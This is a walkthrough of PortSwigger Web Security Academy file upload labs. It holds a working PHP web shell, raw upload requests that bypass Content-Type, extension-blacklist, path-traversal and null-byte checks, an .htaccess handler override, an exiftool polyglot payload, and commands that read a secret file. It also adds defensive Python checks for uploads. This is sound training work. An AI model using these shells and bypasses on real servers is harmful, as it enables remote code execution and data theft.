Walk-through of the File upload vulnerabilities labs on PortSwigger Web Security Academy.
- Apprentice – Remote code execution via web shell upload
- Apprentice – Web shell upload via Content-Type restriction bypass
- Practitioner – Web shell upload via path traversal
- Practitioner – Web shell upload via extension blacklist bypass
- Practitioner – Web shell upload via obfuscated file extension
- Practitioner – Remote code execution via polyglot web shell upload
- Expert – Web shell upload via race condition
Apprentice – Remote code execution via web shell upload
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret.
Create a file webshell.php with the following content:
<?php passthru($_REQUEST[c]); ?>
Click on My account and enter the provided credentials (wiener:peter). Click on Choose File to update the Avatar image and select webshell.php. Click on Upload.
Inspect the page. The Avatar image is located at /files/avatars/webshell.php.
https://<LAB ID>.web-security-academy.net/files/avatars/webshell.php?c=cat%20/home/carlos/secret
We obtain the secret file. Click Submit the solution.
MtOzuGqwEbNd6BMIIUbmwk3S0nhIXiBK
Apprentice – Web shell upload via Content-Type restriction bypass
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
Create a file webshell.php with the following content:
<?php passthru($_REQUEST[c]); ?>
- Click on My account and enter the provided credentials (wiener:peter).
- Click on Choose File to update the Avatar image and select webshell.php.
- Click on Upload. We get an error:
HTTP/1.1 403 Forbidden
Date: Tue, 07 Feb 2023 14:27:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 238
Sorry, file type application/octet-stream is not allowed
Only image/jpeg and image/png are allowed
Sorry, there was an error uploading your file.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>
Send the request to the Repeater module. Change Content-Type from “application/octet-stream” to “image/jpeg”.
POST /my-account/avatar HTTP/1.1
...
Content-Type: multipart/form-data; boundary=---------------------------8917356433747280746683964460
Content-Length: 508
...
-----------------------------8917356433747280746683964460
Content-Disposition: form-data; name="avatar"; filename="webshell.php"
Content-Type: image/jpeg
<?php passthru($_REQUEST[c]); ?>
-----------------------------8917356433747280746683964460
Content-Disposition: form-data; name="user"
wiener
-----------------------------8917356433747280746683964460
Content-Disposition: form-data; name="csrf"
n0bXCxETqbab4iyX7uIk4rUSlrBrpxoJ
-----------------------------8917356433747280746683964460--
Inspect the page. The Avatar image is located at /files/avatars/webshell.php.
https://<LAB ID>.web-security-academy.net/files/avatars/webshell.php?c=cat%20/home/carlos/secret
GET /files/avatars/webshell.php?c=cat%20/home/carlos/secret HTTP/1.1
...
We obtain the secret file. Click Submit the solution.
RkFG4FCwk8mziFigQkqrNkhnab3JBy5i
Practitioner – Web shell upload via path traversal
This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability. To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
Web servers often use the filename field in multipart/form-data requests to determine the name and location where the file should be saved.
Create a file webshell.php with the following content:
<?php passthru($_REQUEST[c]); ?>
- Click on My account and enter the provided credentials (wiener:peter).
- Click on Choose File to update the Avatar image and select webshell.php.
- Click on Upload.
- Inspect the page. The Avatar image is located at /files/avatars/webshell.php. However, the file is not executed.
- Send the request to the Repeater and replace the filename with “../webshell.php” to upload it to the files directory. It gives the message “The file avatars/webshell.php has been uploaded.”, which is not the expected result.
- URL-encode the / (%2f) and send the request. The webshell will be uploaded in the files directory.
POST /my-account/avatar HTTP/1.1
...
Cookie: session=RckXGmQg72YWAtC3xrRXVI97QhkyUHw0
Content-Length: 459
...
------WebKitFormBoundary9h8yeuTfegvyCX2q
Content-Disposition: form-data; name="avatar"; filename="..%2fwebshell.php"
Content-Type: application/octet-stream
<?php passthru($_REQUEST[c]); ?>
------WebKitFormBoundary9h8yeuTfegvyCX2q
Content-Disposition: form-data; name="user"
wiener
------WebKitFormBoundary9h8yeuTfegvyCX2q
Content-Disposition: form-data; name="csrf"
aHL8pOr7znjCUsw0IsHieWdJptbVrGve
------WebKitFormBoundary9h8yeuTfegvyCX2q--
HTTP/1.1 200 OK
Date: Wed, 15 Feb 2023 20:02:16 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 136
The file avatars/../webshell.php has been uploaded.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>
Access the webshell to read the secret file.
https://<LAB ID>.web-security-academy.net/files/webshell.php?c=cat%20/home/carlos/secret
We obtain the secret file. Click Submit the solution.
LoIGEFW9wmt2ArqgrRAkDy4IwsU0xiYC
Practitioner – Web shell upload via extension blacklist bypass
This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed due to a fundamental flaw in the configuration of this blacklist. To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
Create a file webshell.php with the following content:
<?php passthru($_REQUEST[c]); ?>
- Click on My account and enter the provided credentials (wiener:peter).
- Click on Choose File to update the Avatar image and select webshell.php.
- Click on Upload. We get this message:
Sorry, php files are not allowed
Sorry, there was an error uploading your file.
Create a file .htaccess locally with the following content:
AddType application/x-httpd-php .l33t
- Upload the file.
- Change the value of the filename parameter to “.htaccess”.
- Change the value of the Content-Type header to “text/plain”.
POST /my-account/avatar HTTP/1.1
...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXQ9bQMD0l3oFDfao
...
------WebKitFormBoundaryXQ9bQMD0l3oFDfao
Content-Disposition: form-data; name="avatar"; filename=".htaccess"
Content-Type: text/plain
AddType application/x-httpd-php .l33t
------WebKitFormBoundaryXQ9bQMD0l3oFDfao
Content-Disposition: form-data; name="user"
wiener
------WebKitFormBoundaryXQ9bQMD0l3oFDfao
Content-Disposition: form-data; name="csrf"
jvgJUsOEhjvh1Y6dF7gf8OCKz9Dgw9YB
------WebKitFormBoundaryXQ9bQMD0l3oFDfao--
Upload the webshell (.l33t).
POST /my-account/avatar HTTP/1.1
...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqQBNC96c1YVuBBsI
...
------WebKitFormBoundaryqQBNC96c1YVuBBsI
Content-Disposition: form-data; name="avatar"; filename="webshell.l33t"
Content-Type: application/octet-stream
<?php passthru($_REQUEST[c]); ?>
------WebKitFormBoundaryqQBNC96c1YVuBBsI
Content-Disposition: form-data; name="user"
wiener
------WebKitFormBoundaryqQBNC96c1YVuBBsI
Content-Disposition: form-data; name="csrf"
jvgJUsOEhjvh1Y6dF7gf8OCKz9Dgw9YB
------WebKitFormBoundaryqQBNC96c1YVuBBsI--
HTTP/1.1 200 OK
Date: Fri, 17 Feb 2023 15:09:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Length: 134
The file avatars/webshell.l33t has been uploaded.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>
Access the webshell to read the secret file.
https://<LAB ID>.web-security-academy.net/files/avatars/webshell.l33t?c=cat%20/home/carlos/secret
We obtain the secret file. Click Submit the solution.
xPRopdAaKALblqmCEB3uIG0n9TbXTytU
Practitioner – Web shell upload via obfuscated file extension
This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed using a classic obfuscation technique. To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
Create a file webshell.php with the following content:
<?php passthru($_REQUEST[c]); ?>
- Click on My account and enter the provided credentials (wiener:peter).
- Click on Choose File to update the Avatar image and select webshell.php.
- Click on Upload. We get this message:
Sorry, only JPG & PNG files are allowed
Sorry, there was an error uploading your file.
Send the request to the Repeater. Change the filename to “webshell.php%00.jpg”.
POST /my-account/avatar HTTP/1.1
...
------WebKitFormBoundary8ZHnoZ9WEPCW6MbC
Content-Disposition: form-data; name="avatar"; filename="webshell.php%00.jpg"
Content-Type: application/octet-stream
<?php passthru($_REQUEST[c]); ?>
------WebKitFormBoundary8ZHnoZ9WEPCW6MbC
Content-Disposition: form-data; name="user"
wiener
------WebKitFormBoundary8ZHnoZ9WEPCW6MbC
Content-Disposition: form-data; name="csrf"
1JgfDFdUXGnu1TpJPgM1QX34z2LjcmRn
------WebKitFormBoundary8ZHnoZ9WEPCW6MbC--
HTTP/1.1 200 OK
Date: Mon, 20 Feb 2023 14:20:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Length: 133
The file avatars/webshell.php has been uploaded.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>
Access the webshell to read the secret file.
https://<LAB ID>.web-security-academy.net/files/avatars/webshell.php?c=cat%20/home/carlos/secret
We obtain the secret file. Click Submit the solution.
SM1k317Urntufx4jJ3oJSU6mr46qfBfE
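The path traversal, blacklist and obfuscated-extension labs above all succeed because the server lets the client-supplied filename decide where and under what name the file is stored. The following is an added example, not code from the labs or from PortSwigger: a server-side check that decodes the name, rejects each filename used in the requests above, and stores accepted files under a server-generated name. The function names and the allowlist are assumptions made for illustration.

```python
import secrets
from urllib.parse import unquote

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png"}  # allowlist instead of a blacklist

# Filenames taken from the requests in the walkthrough, plus one benign name.
SAMPLE_NAMES = ["webshell.php", "..%2fwebshell.php", ".htaccess",
                "webshell.l33t", "webshell.php%00.jpg", "avatar.JPG"]


def fully_decode(value, max_rounds=3):
    """URL-decode until the value stops changing, so nested encoding is visible."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many layers of URL encoding")


def stored_name_for(client_filename):
    """Validate a client filename and return a server-generated name for disk."""
    name = fully_decode(client_filename)
    if any(ord(ch) < 32 or ord(ch) == 127 for ch in name):
        raise ValueError("control character in filename")  # e.g. %00 truncation
    if "/" in name or "\\" in name:
        raise ValueError("path separator in filename")
    if name.startswith("."):
        raise ValueError("dotfile not allowed")  # .htaccess and similar
    stem, dot, ext = name.rpartition(".")
    ext = ext.lower()
    if not (stem and dot) or ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not in allowlist")
    # The client's name is discarded; only the allowlisted extension survives.
    return f"{secrets.token_hex(16)}.{ext}"


def review(names):
    """Map each filename to 'accepted' or the reason it was rejected."""
    results = {}
    for name in names:
        try:
            stored_name_for(name)
            results[name] = "accepted"
        except ValueError as exc:
            results[name] = str(exc)
    return results


if __name__ == "__main__":
    for name, verdict in review(SAMPLE_NAMES).items():
        print(f"{name!r}: {verdict}")
```

Name validation does not replace server configuration: the upload directory should also be served without script execution and without honouring per-directory overrides such as .htaccess.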
Practitioner – Remote code execution via polyglot web shell upload
This lab contains a vulnerable image upload function. Although it checks the contents of the file to verify that it is a genuine image, it is still possible to upload and execute server-side code. To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
Download any image and insert a PHP webshell payload using ExifTool.
wget -O webshell.jpg http://placekitten.com/100/100
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' webshell.jpg -o webshell.php
- Click on My account and enter the provided credentials (wiener:peter).
- Click on Choose File to update the Avatar image and select webshell.php.
- Access the webshell to read the secret file.
https://<LAB ID>.web-security-academy.net/files/avatars/webshell.php?cmd=cat%20/home/carlos/secret
We obtain the secret file. Click Submit the solution.
Xf7lGsMYGhNbZk9NBBHL4jchA89IL0He
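The Content-Type lab trusts a header the client controls, and the polyglot lab passes a content check because the file really is an image. The following is an added example, not code from the labs: an inspection routine that compares the declared type with the file's magic bytes and walks the JPEG header segments looking for a PHP open tag. The sample byte strings are constructed placeholders and the function names are assumptions.

```python
import struct

MAGIC = {b"\xff\xd8\xff": "image/jpeg", b"\x89PNG\r\n\x1a\n": "image/png"}

# Constructed samples: a script body, a JPEG with a COM segment, a bare PNG header.
PLACEHOLDER = b"<?php /* constructed placeholder */ ?>"
COM_SEGMENT = b"\xff\xfe" + struct.pack(">H", len(PLACEHOLDER) + 2) + PLACEHOLDER
POLYGLOT_JPEG = b"\xff\xd8" + COM_SEGMENT + b"\xff\xd9"
CLEAN_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def sniff_type(data):
    """Return the MIME type implied by the leading bytes, or None."""
    for magic, mime in MAGIC.items():
        if data.startswith(magic):
            return mime
    return None


def jpeg_segments(data):
    """Yield (marker, payload) for each JPEG header segment up to SOS/EOI."""
    pos = 2  # skip SOI (FF D8)
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker in (0xDA, 0xD9):  # start of scan / end of image
            return
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + max(length, 2)  # length includes its own two bytes


def inspect_upload(declared_type, data):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    actual = sniff_type(data)
    if actual is None:
        findings.append("content is not a JPEG or PNG")
    elif actual != declared_type:
        findings.append(f"declared {declared_type}, content is {actual}")
    if actual == "image/jpeg":
        for marker, payload in jpeg_segments(data):
            if b"<?php" in payload.lower():
                findings.append(f"PHP open tag in JPEG segment 0x{marker:02X}")
    elif b"<?php" in data.lower():
        findings.append("PHP open tag in content")
    return findings
```

The tag scan is a heuristic for logging and triage. What stops the polyglot from running is the stored extension and a non-executable upload directory; re-encoding the image server-side also drops metadata segments.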
Expert – Web shell upload via race condition
This lab contains a vulnerable image upload function. Although it performs robust validation on any files that are uploaded, it is possible to bypass this validation entirely by exploiting a race condition in the way it processes them. To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
NOT COMPLETED